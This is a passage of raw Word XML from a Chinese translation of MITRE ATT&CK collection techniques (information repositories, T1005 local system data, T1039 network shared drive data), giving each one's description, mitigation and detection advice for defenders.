          <w:p w14:paraId="4420F49E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发和发布定义可存储在存储库中的可接受信息的策略。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ED93252" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6C39B3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE4D90" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于信息库通常具有相当大的用户群，因此检测恶意使用并非易事。至少应该密切监视和警告对特权用户（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Active Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域企业管理员）执行的信息库的访问，因为这些类型的帐户通常不应用于访问信息库。如果该功能存在，监视和警告正在检索和查看大量文档和页面的用户可能是有价值的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此行为可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索存储库中的所有数据的编程方法。在具有高成熟度的环境中，可以利用用户行为分析（</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UBA</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）平台来检测和警告基于用户的异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022565D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009D7B0C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft SharePoint</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的用户访问日志记录配置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报对某些页面和文档的访问。</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atlassian</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Confluence</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的用户用户访问日志记录也可以配置为通过</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AccessLogFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报对某些页面和文档的访问。需要额外的日志存储和分析基础架构才能实现更强大的检测功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705831CE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CC2814" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2814">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="72106AB3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="027BAE24" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1005</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD449C2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="341E778A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FDCAE5F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问某些文件和目录的特权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="201A1FB2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>数据源：文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253EB773" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ADA5082" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="004F5535" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244F7241" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从本地系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据源</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集敏感数据，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>留存</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在系统上的文件系统或信息数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DEF82A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通常会在他们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的计算机上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索文件系统来</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感兴趣的文件。他们可以使用命令行界面（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来执行此操作，该界面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与文件系统交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集信息的功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可能在本地系统上使用自动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>化</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E320DA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E700A82" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5009BB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891EFA7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看是否有从</w:t>
      </w:r>
      <w:r>
        <w:t>系统收集文件的相关操作</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A38D4B" w14:textId="6465232C" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>共享网络驱动</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>器</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0022511E" w14:paraId="012126B2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7055DA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1039</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729A83B4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CBB85BB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31061BCB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权访问网络共享驱动器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526511D0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>数据源：文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6934F4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FD63B06" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00671CC1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A35683" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EB6DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:t>数据渗漏之前</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:t>系统访问共享网络驱动器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机共享目录，网络文件服务器等</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:t>收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程系统中的敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A8BDE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在他们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的计算机上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索网络共享来</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感兴趣的文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他们</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会使用</w:t>
      </w:r>
      <w:r>
        <w:t>交互式命令</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>常用功能来收集信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A14D143" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BACDCDF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
